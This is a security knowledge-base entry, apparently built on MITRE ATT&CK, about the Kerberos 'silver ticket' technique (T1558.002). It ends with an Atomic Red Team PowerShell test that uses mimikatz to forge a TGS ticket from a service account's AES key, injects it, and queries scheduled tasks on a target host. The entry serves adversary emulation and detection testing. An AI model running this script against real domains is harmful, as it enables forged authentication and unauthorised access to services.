| name | T1558.002_silver-ticket |
| description | Adversaries who have the password hash of a target service account (e.g. |
| category | authentication |
| version | 18.1 |
| author | cyberstrike-official |
| tags | ["mitre-attack","enterprise","t1558.002","credential-access","windows","sub-technique"] |
| technique_id | T1558.002 |
| tactic | credential-access |
| all_tactics | ["credential-access"] |
| platforms | ["Windows"] |
| mitre_url | https://attack.mitre.org/techniques/T1558/002 |
| tech_stack | ["windows"] |
| cwe_ids | ["CWE-522"] |
| chains_with | ["T1558","T1558.001","T1558.003","T1558.004","T1558.005"] |
| prerequisites | ["T1558"] |
| severity_boost | {"T1558":"Chain with T1558 for deeper attack path","T1558.001":"Chain with T1558.001 for deeper attack path","T1558.003":"Chain with T1558.003 for deeper attack path"} |
T1558.002 Silver Ticket
Sub-technique of: T1558
High-Level Description
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.
Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.
Password hashes for target services may be obtained using OS Credential Dumping or Kerberoasting.
Kill Chain Phase
- Credential Access (TA0006)
Platforms: Windows
What to Check
How to Test
Atomic Red Team Tests
The following tests are from Atomic Red Team and provide actionable ways to test this technique:
Atomic Test 1: Crafting Active Directory silver tickets with mimikatz
Once the hash of service account is retrieved it is possible to forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets.
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
Supported Platforms: windows
Remove-Item $env:TEMP\silver.bat -ErrorAction Ignore
Remove-Item $env:TEMP\silver.txt -ErrorAction Ignore
# get current domain SID if default was used
$domain_sid = "#{domain_sid}"
If ($domain_sid -Match "DEFAULT") {
# code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
$domain = gwmi Win32_ComputerSystem | Select -Expand Domain
$krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
$domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}
# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to silver.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\silver.txt 2>&1 (
echo Purge existing tickets and create silver ticket:
klist purge
#{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt" "exit"
echo.
echo executing:schtasks /query /S #{target}.#{domain}
schtasks /query /S #{target}.#{domain}
echo.
echo Tickets after requesting schtasks:
klist
echo.
echo End of Silver Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\silver.bat
# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\silver.bat" | Out-Null
# wait until the output file has logged the entire attack
do {
Start-Sleep 1 # wait a bit so the output file has time to be created
Get-Content -Path "$env:TEMP\silver.txt" -Wait | ForEach-Object {
if ($_ -match 'End of Silver Ticket attack') { break }
}
} while ($false) # dummy loop so that 'break' can be used
# show output from new empty session
Get-Content $env:TEMP\silver.txt
# cleanup temp files
Remove-Item $env:TEMP\silver.bat -ErrorAction Ignore
Remove-Item $env:TEMP\silver.txt -ErrorAction Ignore